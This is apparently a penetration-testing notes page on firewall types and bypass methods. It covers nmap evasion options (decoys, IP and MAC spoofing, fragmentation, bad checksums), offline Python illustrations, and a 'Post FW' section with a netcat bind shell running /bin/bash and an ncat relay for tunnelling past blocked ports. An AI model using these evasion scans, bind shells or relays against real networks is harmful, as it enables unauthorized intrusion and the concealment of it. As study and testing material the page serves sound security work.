# Firewall Handling and Bypassing

## Types

* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS

## Rules

* Firewalls evaluate rule sets like the examples below: each rule matches on direction, protocol and port and then allows or blocks the traffic

### Windows

```sh
# allow inbound TCP 57869 (rule named "muka"); run from an elevated prompt
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
```

### Linux

```sh
# open TCP 57869 in the public zone for the running configuration only;
# add --permanent (then firewall-cmd --reload) to keep it across restarts
firewall-cmd --zone=public --add-port=57869/tcp
```

## Bypassing Firewalls

* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification

### nmap

* nmap offers several options for evading a firewall that sits between the scanner and the target. The ones below change who the probes appear to come from, how the packets are cut up, and what the IP header contains.

#### Spoofing

* __Decoy__ `-D`, mixes the real scan with probes whose source address is spoofed to each listed decoy, so the target's logs show the same port scan arriving from every address and cannot tell which one is real. `ME` marks where the scanner's own address goes in the sequence; `RND` inserts a random address (`RND:n` inserts n of them). Decoys should be hosts that are up, otherwise the target may end up SYN flooded, and a filter that checks TTLs or routing can still single out the real source.
```sh
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```
* __Proxy__, `--proxies` takes a comma-separated list of proxy URLs (`http://host:port` or `socks4://host:port`). It only applies to the connections nmap opens through its own socket library (NSE scripts and version detection), not to the raw port-scan probes, so the scan itself is not hidden behind the proxy
```sh
sudo nmap -Pn -F --proxies socks4://$PROXY_IP:1080 $TARGET_IP
```
* __Spoofed MAC__, `--spoof-mac` sets the Ethernet source address (a full MAC, a vendor prefix or vendor name, or `0` for a random one). It only changes the layer-2 header, so it matters when the target or the filter is on the same segment, and it requires raw Ethernet sending (root)
```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
```
* __Spoofed IP__, `-S` writes a different source address into the probes. Replies then go to that address instead of the scanner, so this is for blind scans or for cases where the spoofed host's traffic can be sniffed; nmap usually needs `-e` as well to know which interface to send on
```sh
sudo nmap -Pn -F -e $IFACE -S $SPOOFED_IP $TARGET_IP
```
* __Port Number__, `--source-port` (alias `-g`) sends probes from a port that sloppy rule sets allow inbound, commonly 53, 80 or 443 (a rule that lets DNS replies through, for example). It only works for raw scans; connect scans (`-sT`) and version detection use the OS stack and ignore it
```sh
sudo nmap -F --source-port 443 $TARGET_IP
```
* __Fragmentation__, `-f` splits each probe into IP fragments carrying 8 bytes of TCP/UDP data after the 20-byte IP header, `-ff` into 16-byte fragments. A 20-byte TCP header therefore spans three fragments with `-f`, and the flags byte lands in the second one, which defeats filters that only inspect the first fragment
```sh
sudo nmap -Pn -F -f $TARGET_IP
```
* __MTU__, `--mtu` sets the fragment data size explicitly; it must be a multiple of 8, and `-f` == `--mtu 8`, `-ff` == `--mtu 16`. Raw scans only (not `-sT`), and a sending kernel that defragments outgoing packets (Linux with iptables connection tracking loaded, for example) silently undoes it
```sh
sudo nmap -Pn -F --mtu 8 $TARGET_IP
```
* __Data Length__, `--data-length` appends the given number of random bytes to each probe. nmap's default probes carry no payload at all, which is a signature in itself; padding makes them look more like regular traffic (and, combined with `-f`, produces more fragments)
```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP
```
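
What `-f`, `--mtu` and `--data-length` actually do to a probe is easier to see on bytes than in prose. The Python below is an added illustration written for this page; it is not nmap's code and it sends nothing. It builds a 20-byte TCP header with SYN set, cuts it into IPv4 fragments of the chosen size the way the options above do, and reports which fragment ends up holding the TCP flags byte. The addresses, ports and the IP ident value are made-up constants.

```python
import random
import socket
import struct

IP_HDR_LEN = 20
TCP_HDR_LEN = 20
TCP_FLAGS_OFFSET = 13  # byte offset of the flags field inside the TCP header


def ip_checksum(header: bytes) -> int:
    """One's-complement checksum over an IPv4 header (RFC 791)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_syn(src_port: int, dst_port: int, seq: int = 0) -> bytes:
    """20-byte TCP header with only SYN set. The TCP checksum stays 0 here:
    the point is the layout of the bytes, not a sendable probe."""
    data_offset = (TCP_HDR_LEN // 4) << 4  # header length in 32-bit words
    return struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0,
                       data_offset, 0x02, 65535, 0, 0)


def add_random_payload(transport: bytes, n: int) -> bytes:
    """Model of --data-length: append n random bytes after the transport header."""
    return transport + bytes(random.getrandbits(8) for _ in range(n))


def build_ipv4(src: str, dst: str, payload: bytes, frag_offset_units: int = 0,
               more_fragments: bool = False, ident: int = 0x1234,
               ttl: int = 64, proto: int = 6) -> bytes:
    """IPv4 header + payload. The offset is in 8-byte units, as on the wire."""
    flags_frag = (0x2000 if more_fragments else 0) | (frag_offset_units & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + len(payload), ident,
                      flags_frag, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def fragment_packet(src: str, dst: str, transport: bytes, mtu: int) -> list:
    """Split the transport bytes into IPv4 fragments carrying mtu bytes each.
    -f is mtu=8, -ff is mtu=16, --mtu N is N; nmap rejects N not divisible by 8."""
    if mtu <= 0 or mtu % 8:
        raise ValueError("fragment payload size must be > 0 and a multiple of 8")
    frags = []
    for off in range(0, len(transport), mtu):
        chunk = transport[off:off + mtu]
        frags.append(build_ipv4(src, dst, chunk, off // 8, off + mtu < len(transport)))
    return frags


def parse_fragment(pkt: bytes) -> dict:
    """Pull out the fields a reassembler or a packet filter looks at."""
    (_, _, total_len, ident, flags_frag, _, proto,
     _, _, _) = struct.unpack("!BBHHHBBH4s4s", pkt[:IP_HDR_LEN])
    return {"ident": ident, "proto": proto, "mf": bool(flags_frag & 0x2000),
            "offset": flags_frag & 0x1FFF, "payload": pkt[IP_HDR_LEN:total_len]}


def fragment_carrying_tcp_flags(frags: list) -> int:
    """Index of the fragment containing TCP byte 13 (SYN/ACK/RST flags).
    A filter that only inspects the first fragment sees the flags only if this is 0."""
    for i, pkt in enumerate(frags):
        f = parse_fragment(pkt)
        start = f["offset"] * 8
        if start <= TCP_FLAGS_OFFSET < start + len(f["payload"]):
            return i
    raise ValueError("no fragment carries the TCP flags field")


def reassemble(frags: list) -> bytes:
    """What the target's IP stack does before handing the segment to TCP."""
    parts = sorted((parse_fragment(p) for p in frags), key=lambda f: f["offset"])
    return b"".join(f["payload"] for f in parts)
```

With 8-byte fragments the flags byte sits in the second fragment, so a filter that matches on SYN in the first fragment sees only ports and sequence number; with 16-byte fragments (`-ff`) the flags are back in the first fragment, which is why `-ff` is weaker against that kind of filter. A device that reassembles before filtering is not fooled by either.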

#### Header Fields

* __TTL__, `--ttl` sets the IPv4 time-to-live of the probes, e.g. to the value a normal host on the attacker's OS would use (64 on Linux, 128 on Windows) so the scan does not stand out in logs
```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP
```
* __IP OPTIONS__, `--ip-options` adds IPv4 options to the probes, given either as a hex string (`\x..` bytes) or with these shortcuts:

    * Record route, `R`
    * Timestamp, `T`
    * Record route + timestamp, `U`
    * Loose source routing, `L $IP $IP $IP`
    * Strict source routing, `S $IP $IP $IP`

  Most networks drop source-routed packets, so `L` and `S` mostly tell you whether the filter in front of the target does too.

* __Checksum__, `--badsum` sends probes with an invalid TCP/UDP/SCTP checksum. A real host drops them silently, so any reply (SYN/ACK or RST) came from a firewall, IDS or proxy in the path that answers without verifying checksums
```sh
sudo nmap -Pn -F --badsum $TARGET_IP
```
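
Reading a `--badsum` result is the part people get wrong: the interesting output is whatever is *not* `filtered`. The Python below is an added example for this page (not nmap's code) that parses grepable (`-oG`) output and lists the ports that answered a bad-checksum probe, next to the state the normal scan reported. Both scan outputs are constructed samples embedded in the block, and the host `10.0.0.7` is made up.

```python
# Constructed sample nmap -oG output, not a real scan: one host scanned
# normally (NORMAL_SCAN) and then with --badsum (BADSUM_SCAN).
NORMAL_SCAN = """\
# Nmap scan initiated (constructed sample) as: nmap -Pn -F -oG - 10.0.0.7
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (96)
# Nmap done (constructed sample)
"""

BADSUM_SCAN = """\
# Nmap scan initiated (constructed sample) as: nmap -Pn -F --badsum -oG - 10.0.0.7
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (98)
# Nmap done (constructed sample)
"""

VERDICTS = {
    "open": "SYN/ACK to a bad checksum: something in front of the host completes handshakes (proxy, load balancer, proxy firewall)",
    "closed": "RST to a bad checksum: a device in the path sends resets without verifying checksums",
    "filtered": "dropped, as a real host (or a checksum-verifying filter) would",
}


def parse_grepable(text: str) -> dict:
    """host -> {"ports": {(port, proto): state}, "default": ignored-state}.
    Ports in the 'Ignored State' are not listed individually in -oG output,
    so the default has to be carried along to interpret missing ports."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and 'Status:' lines carry no port data
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports, default = {}, None
        for field in fields[1:]:
            if field.startswith("Ports: "):
                for entry in field[len("Ports: "):].split(", "):
                    port, state, proto = entry.split("/")[:3]
                    ports[(int(port), proto)] = state
            elif field.startswith("Ignored State: "):
                default = field.split()[2]  # "Ignored State: closed (96)" -> "closed"
        results[host] = {"ports": ports, "default": default}
    return results


def badsum_responders(badsum_text: str) -> dict:
    """host -> ports that produced any answer to a bad-checksum probe.
    A conforming stack discards such segments, so every non-filtered state
    was generated by a middlebox, not by the target itself."""
    return {host: {pp: st for pp, st in info["ports"].items() if st != "filtered"}
            for host, info in parse_grepable(badsum_text).items()}


def middlebox_suspected(badsum_text: str, host: str) -> bool:
    """True if anything answered: listed ports, or an ignored state that is
    not 'filtered' (meaning the bulk of the range got RSTs or SYN/ACKs)."""
    info = parse_grepable(badsum_text)[host]
    return bool(badsum_responders(badsum_text)[host]) or info["default"] != "filtered"


def compare_scans(normal_text: str, badsum_text: str, host: str) -> dict:
    """(port, proto) -> (state in normal scan, state in badsum scan, interpretation)."""
    normal = parse_grepable(normal_text)[host]
    bad = parse_grepable(badsum_text)[host]
    out = {}
    for pp in sorted(set(normal["ports"]) | set(bad["ports"])):
        n = normal["ports"].get(pp, normal["default"])
        b = bad["ports"].get(pp, bad["default"])
        out[pp] = (n, b, VERDICTS.get(b, "unexpected state"))
    return out


if __name__ == "__main__":
    for pp, (n, b, why) in compare_scans(NORMAL_SCAN, BADSUM_SCAN, "10.0.0.7").items():
        print("%d/%s  normal=%-9s badsum=%-9s %s" % (pp[0], pp[1], n, b, why))
```

In the sample, 22 and 8080 fall back to the ignored state `filtered` in the badsum scan (the host dropped the broken probes, as expected), while 80 and 443 still answered: those two replies did not come from the host's TCP stack, so whatever sits in front of it is what you are talking to.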

#### Post FW

After the firewall has been bypassed there are further steps to gain a foothold. One of them is to open a bind shell on a port that inbound rules usually allow, such as 443 or 80, so the connection looks like ordinary web traffic to the filter.

* __Hopping__, on a host that is already past the firewall (the pivot), listen with netcat on an allowed port and use that host to reach the rest of the segment
* __Tunneling__, once past the firewall, open a relay on the pivot: it accepts connections on the allowed port and forwards each one to the port the firewall blocks (here 25)
```sh
# --sh-exec is an Ncat option; where nc is not Ncat, call ncat explicitly
ncat -lvnp 443 --sh-exec "ncat $TARGET_IP 25"
```
* __Non standard ports__, open a bind shell on a high port (needs a netcat build that supports `-e`, e.g. Ncat or nc.traditional)
```sh
nc -lvnp 8888 -e /bin/bash
```
and connect to it from the attacking host.
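
To show what the relay one-liner above does under the hood, here is an added Python example written for this page (it is neither the page's original code nor Ncat's): a minimal TCP relay that listens on the allowed port and forwards every connection to the blocked one. So that it runs offline and without root it uses loopback and ephemeral ports instead of 443 and 25, and an echo server stands in for the blocked service; the message sent through it is made up.

```python
import socket
import threading


def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then pass the EOF on with a half-close."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client: socket.socket, target: tuple) -> None:
    """Connect to the blocked service and splice both directions,
    which is what `ncat -l <open port> --sh-exec "ncat host <blocked port>"` does."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()  # target unreachable: drop the client cleanly
        return
    back = threading.Thread(target=pipe, args=(upstream, client), daemon=True)
    back.start()
    pipe(client, upstream)
    back.join()
    client.close()
    upstream.close()


def listen_on(addr: tuple) -> socket.socket:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(addr)
    srv.listen(8)
    return srv


def serve_forever(srv: socket.socket, per_conn) -> None:
    """Accept in a background thread and hand each connection to per_conn."""
    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # server socket was shut down: stop accepting
            threading.Thread(target=per_conn, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()


def stop(srv: socket.socket) -> None:
    """shutdown() wakes a blocked accept(); close() releases the port."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def start_relay(listen_addr: tuple, target: tuple) -> tuple:
    """Relay listen_addr (the allowed port) -> target (the blocked port)."""
    srv = listen_on(listen_addr)
    serve_forever(srv, lambda client: handle(client, target))
    return srv, srv.getsockname()[1]


def echo(conn: socket.socket) -> None:
    """Stand-in for the service behind the firewall."""
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)


def start_echo_backend() -> tuple:
    srv = listen_on(("127.0.0.1", 0))
    serve_forever(srv, echo)
    return srv, srv.getsockname()[1]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def relay_roundtrip(message: bytes) -> bytes:
    """Send message through the relay to the backend; return what comes back."""
    backend, backend_port = start_echo_backend()
    relay, relay_port = start_relay(("127.0.0.1", 0), ("127.0.0.1", backend_port))
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.settimeout(5)
            c.sendall(message)
            return recv_exact(c, len(message))
    finally:
        stop(relay)
        stop(backend)


def relay_to_dead_target() -> bytes:
    """What a client sees when the relay's target refuses connections: EOF."""
    probe = listen_on(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]
    stop(probe)  # nothing listens on dead_port any more
    relay, relay_port = start_relay(("127.0.0.1", 0), ("127.0.0.1", dead_port))
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.settimeout(5)
            try:
                return c.recv(1)
            except ConnectionResetError:
                return b""
    finally:
        stop(relay)
```

The half-close in `pipe` is the detail that makes the relay transparent: when one side sends EOF the relay forwards it instead of tearing the whole connection down, so protocols that close one direction first (SMTP's QUIT, for example) behave exactly as they would without the hop.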